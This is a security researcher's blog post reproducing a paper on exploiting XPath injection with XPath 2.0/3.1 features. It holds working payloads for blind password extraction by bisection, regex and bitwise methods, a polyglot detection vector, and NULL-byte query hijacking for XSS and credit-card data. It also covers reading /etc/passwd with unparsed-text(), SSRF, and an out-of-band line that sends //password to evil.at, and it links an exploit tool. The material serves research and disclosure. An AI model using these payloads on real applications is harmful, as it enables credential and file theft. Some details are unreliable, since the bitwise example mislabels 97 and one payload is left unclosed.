Modern XPath Exploitation
Now that XML technologies are being widely used in modern web applications, XPath injections are becoming more relevant.
Following the release of XPath 2.0 and XPath 3.1 I wanted to see if I could design new attack vectors. Turns out that these new XPath implementation did introduce new threats and new risks that expand the attack surface of XPath vulnerabilities.
I wrote a .txt for your convenience and you can find it here:
http://nzt-48.org/Papers/modern-xpath-exploitation.txt
If you prefer to read the paper in this blog post, click on "more"
A tool was released as a proof of concept and you can find it here:
https://github.com/tr3w/injectX
=======================================
Modern XPath Exploitation
=======================================
Ruben V PiƱa
http://nzt-48.org
@tr3w_
07-20-2023
Abstract
=========
With the introduction of XPath 2.0 and XPath 3.1, many new functionalities have been
added to XPath. This new functions allow attackers to perform more sophisticated and
powerful attacks compared to all other currently public exploitation techniques.
At the time this document was written, all XPath exploitation tools extract information
through very limited techniques such as brute-force.
The purpose of this paper is to optimize the information extraction process as much as
possible and to leverage more lethal attacks such as remote file disclosure, XSS,
turning blind injections into visible injections and others.
An exploitation tool has been written as a proof of concept.
Bisection method
=================
Instead of doing a brute-force attack, it is possible to use a binary search to make
the data extraction process much faster.
Before XPath 2, the binary search was performed using the contains() function. This means
that the full character set needs to be sent to the server. When dealing with non-latin
alphabets such as japanese or others this task becomes very tedious.
The new function 'string-to-codepoints' converts any character into its numeric unicode
representation. The new operators "less than (<)" and "greater than (>)" can be combine
with 'string-to-codepoints' to perform a binary search algorithm to find the characters
faster:
1' and string-to-codepoints(substring(password/text())) >= %d and
string-to-codepoints(substring(password/text())) < %d and '1
xcat is the only tool out there that uses this technique, a more advanced and optimized
technique has been designed (see the bitwise section).
RegExp Method
=============
New functions for performing regular expressions were also added to the language. It is
possible to use these functions as another way to implement the bisection method:
1' and matches(substring(password/text(), 1, 1), "[A-Z]" and '1
Request after request, the character ranges will be split in half to narrow down the values of the character being extracted.
Bitwise methods
===============
In 2010, binary based methods were invented to extract information through SQL injection in an extremely optimized fashion. This methods extract characters in their numeric binary representation bit per bit. If the page responds with a TRUE response, it means that the bit in question is a 1. In any other case, the bit being extracted is equal to 0.
(97 / 0x01 % 0x02) = 1 TRUE
(97 / 0x02 % 0x02) = 0 FALSE
(97 / 0x04 % 0x02) = 0 FALSE
(97 / 0x08 % 0x02) = 0 FALSE
(97 / 0x10 % 0x02) = 0 FALSE
(97 / 0x20 % 0x02) = 1 TRUE
(97 / 0x40 % 0x02) = 1 TRUE
(97 / 0x80 % 0x02) = 0 FALSE
-----------------------010000110 = 97 = A
The advantage of this method is that every request is independent from the others, in
contrast to the bisection method in which each request must be performed one after the other in a sequential order. Thus, we can perform all the requests at once with threads which means that the desired character is going to be obtained around 7 times faster than the bisection method because all the bits can be requested at the same time. The injection looks like the following:
1'and(floor(string-to-codepoints(substring(password/text(),1,1))div %d)mod 2)and'1
Since XPath doesn't implement any bitwise functions yet, each individual bit can be
calculated and requested by performing a division over powers of 2 (0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40) and then by calculating its module by 2:
Detection Phase Optimization
============================
Blind XPath injections can happen in single quoted strings, double quoted strings and
numeric contexts.
Usually, 3 injections must be made to find out what is the context of the vulnerable
parameter.
and '1'='
1
and "1"="
1
and 1
This can be improved by using just one injection with a polyglot vector that works in every possible scenario. Instead of making 3 requests, just 1 is done.
and 1 (: ' and " and '"!='!=":)
and 0 (: ' and " and '"='=":)
Comments in XPath need to be opened and closed with the (: :) delimiters.
Turn XPath Injections into Cross-Site-Scripting
==================================================
Instead of returning nodes with XPath, it is also possible to return specific strings
defined by the user:
//users/"this text will be printed"
Even though with XPath it is possible to change the query by injecting more code, most of the time this is not possible because there is always trailing text after the injected value:
//users/username[username/text()='admin']/"print this text" ']/password
As you can see, the only way to inject arbitrary text and make it display
would be to break the encapsulation by closing the quote and the bracket and
modify the entire query at will. However, the fact that there is trailing text after
the injection is a problem because this would yield invalid code or would augment the
complexity of the injection.
In contrast to SQL, there are no single line comments such as -- and # to ignore
the trailing text.
However, I found an undocumented feature in XPath which is useful for commenting out
trailing text. I made use of a NULL byte after the injection. This terminates the string and all the ending trails will be ignored; the attacker controls the output as a result:
//users/username[username/text()='admin']/""%00']/password
That line would use XPath to leverage a XSS attack.
Comments about implementation differences
-----------------------------------------
As this NULL byte functionality doesn't appear in the XPath specifications, it is very
likely that it might work only in certain XPath implementations.
I tested it in the Saxon implementation by Saxonica (http://saxonica.com) but I really
do not have the chance to test it in other implementations.
It might be interesting to find out if the NULL byte terminator works in all XPath
implementations. If someone wants to b contribute by testing the NULL byte in other
implementations the help would be highly appreciated.
List of other XPath Implementations:
https://en.wikipedia.org/wiki/XPath#Implementations
Turning Blind Injections Into Visible Injections
================================================
Since there is trailing text after the injection point, the only possible way to extract other nodes than the ones intended to be displayed was through blind boolean injections.
After seeing how the NULL byte trick works, it is only logical to conclude that the
entire query can be changed and any desired node can be displayed by escaping from
the conditional braces and add other selectors at the end along with a NULL byte
to ignore the original query and replace it with whatever statement the attacker
desires to execute:
//username[username/text()='admin']/CreditCartNumber/text()%00']/original-query
Arbitrary File Disclosure
=========================
XPath can also be exploited to disclose the contents of arbitrary files in the server.
This is achieved with the new unparsed-text() function. The blind injection can be turned into a visible one by using the NULL byte trick in order to modify the query and ignore the original. Thus, the contents of the target file will be completely revealed in one response.
//user[user/text()='break']/unparsed-text('/etc/passwd')%00']/trailing-characters
The unparsed-text() function will literally open the file and show all of its contents.
Sometimes (depending on the software implementation of XPath) the static-base-uri() returns an empty string which means that instead of using relative URIs, absolute paths should be used which can be an obstacle. The function base-uri() can be used to print the location of the static resource.
//user[user/text()='break']/base-uri()%00']
The document-uri() function can also be used for this.
If it is not possible to make the blind injection visible, the content of the files in the server can be extracted character by character through the bitwise extraction methods.
It is worth commenting that at the time this was written, xcat (being the more popular tool nowadays) recently was updated to include this functionality. However, I tested it and this module has a lot of bugs and doesn't work most of the time (at least in my computer).
Server-Side Request Forgery
===========================
It is also possible to force XPath to perform requests to any server by making a HTTP
request through the doc(), doc-available(), unparsed-text() or unparsed-text-available() functions. The server makes the request and it will be excuted on its behalf.
Out Of Boundries Attacks
========================
Same as above:
//user[user/text()='break']/unparsed-text(concat('http://evil.at/?x=',//password
Proof Of Concept
================
An XPath exploitation tool which implements the bitwise bit-anding method has been written.
http://nzt-48.org/tools/
Appendix
========
You can find the XPath specifications here:
https://www.w3.org/TR/xpath-functions-31/
Links to other XPath injection tools (most of them are very old):
xcat
https://github.com/orf/xcat
xxxpwn
https://github.com/feakk/xxxpwn
xpath-blind-explorer
https://github.com/micsoftvn/xpath-blind-explorer
XMLCHOR
https://github.com/Harshal35/XMLCHOR/
Filed under: Hacking,Web Application Security - @ 2023-07-21 02:13
Tags: injection